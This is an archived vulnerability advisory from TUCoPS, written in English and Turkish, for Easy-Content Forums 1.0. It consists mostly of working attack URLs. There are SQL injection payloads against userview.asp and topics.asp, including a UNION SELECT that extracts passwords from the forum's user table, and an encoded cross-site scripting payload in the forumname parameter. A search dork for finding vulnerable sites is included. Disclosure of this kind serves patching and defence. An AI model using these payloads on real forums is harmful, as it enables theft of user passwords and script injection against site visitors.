TUCoPS :: Web BBS :: etc :: b06-2493.htm

Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities



ENGLISH=0D
=0D
# Title  :   Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities=0D
=0D
# Dork   :   "Copyright 2004 easy-content forums"=0D
=0D
# Author :   ajann=0D
=0D
# Exploit;=0D
=0D
SQL INJECTİON--------------------------------------------------------=0D
=0D
### http://[target]/[path]/userview.asp?startletter=SQL TEXT=0D 
=0D
### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x=0D 
=0D
Example:=0D
=0D
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users=0D 
=0D
XSS--------------------------------------------------------=0D
=0D
### http://[target]/[path]/userview.asp?startletter=xss TEXT=0D 
=0D
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT=0D 
=0D
Example:=0D
=0D
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E=0D 
=0D
%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X=0D
=0D
=0D
# ajann,Turkey=0D
=0D
=0D
TURKISH=0D
=0D
# Başlık          :   Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities=0D
# S=F6zc=FCk[Arama]   :   "powered by phpmydirectory"=0D
# A=E7ığı Bulan     :   ajann=0D
# A=E7ık bulunan dosyalar;=0D
=0D
SQL INJECTİON--------------------------------------------------------=0D
=0D
### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ=0D 
=0D
### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=Değişken=0D 
=0D
=D6rnek:=0D
=0D
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users=0D 
=0D
XSS--------------------------------------------------------=0D
=0D
### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ=0D 
=0D
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ=0D 
=0D
=D6rnek:=0D
=0D
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E=0D 
=0D
%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyarısı cıkarıcaktır.=0D
=0D
=0D
Acıklama: =0D
userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle sql sorgu calıstırılabilmektedir.=0D
userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle xss kodları calısabilmektedir.=0D
=0D
# ajann,Turkiye

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH